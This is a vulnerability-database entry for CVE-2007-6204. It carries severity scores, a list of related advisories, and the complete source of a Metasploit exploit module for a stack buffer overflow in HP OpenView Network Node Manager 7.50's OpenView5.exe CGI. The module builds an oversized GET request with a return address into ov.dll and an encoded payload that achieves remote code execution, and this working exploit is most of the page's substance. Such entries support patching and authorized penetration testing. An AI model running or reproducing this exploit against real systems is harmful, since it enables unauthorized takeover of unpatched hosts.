Lucene search
HistoryDec 15, 2009 - 5:41 a.m.
HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
EPSS
0.518
Percentile
97.6%
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request, an attacker may be able to execute arbitrary code.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.
By sending a specially crafted CGI request, an attacker may be able to execute
arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2007-6204' ],
[ 'OSVDB', '39530' ],
[ 'BID', '26741' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => false,
'Payload' =>
{
'Space' => 650,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => '2007-12-06'))
register_options( [ Opt::RPORT(80) ])
end
def exploit
connect
sploit = "GET /OvCgi/OpenView5.exe?Context=Snmp&Action=" + rand_text_alpha_upper(5123)
sploit << [target.ret].pack('V') + payload.encoded
print_status("Trying target %s..." % target.name)
sock.put(sploit + "\r\n\r\n")
handler
disconnect
end
end
Related
packetstorm
packetstorm
HP OpenView Network Node Manager CGI Buffer Overflow
2009-11-26 00:00:00
HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow
2009-12-31 00:00:00
saint
saint
HP OpenView Network Node Manager ovlogin.exe buffer overflow
2007-12-24 00:00:00
HP OpenView Network Node Manager ovlogin.exe buffer overflow
2007-12-24 00:00:00
HP OpenView Network Node Manager ovlogin.exe buffer overflow
2007-12-24 00:00:00
securityvulns
securityvulns
[security bulletin] HPSBMA02281 SSRT061261 rev.1 - HP OpenView Network Node Manager (OV NNM) Remote Unauthorized Execution of Arbitrary Code
2007-12-07 00:00:00
ZDI-07-071: HP OpenView Network Node Manager Multiple CGI Buffer Overflows
2007-12-07 00:00:00
HP OpenView Network Node Manager multiple CGI buffer overflow
2008-04-15 00:00:00
exploitdb
exploitdb
cve
cve
CVE-2007-6204
2007-12-13 21:46:00
cvelist
cvelist
CVE-2007-6204
2007-12-13 21:00:00
prion
prion
Stack overflow
2007-12-13 21:46:00
zdi
zdi
nvd
nvd
CVE-2007-6204
2007-12-13 21:46:00
nessus
nessus
HP OpenView Network Node Manager Multiple CGI Remote Overflows
2007-12-07 00:00:00
HP-UX PHSS_36902 : s700_800 11.X OV NNM7.51 IA-64 Intermediate Patch 17
2007-10-03 00:00:00
HP-UX PHSS_36901 : s700_800 11.X OV NNM7.51 PA-RISC Intermediate Patch 17
2007-10-03 00:00:00
checkpoint_advisories
checkpoint_advisories
CVSS2
10
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
EPSS
0.518
Percentile
97.6%
Related for MSF:EXPLOIT-WINDOWS-HTTP-HP_NNM_OPENVIEW5-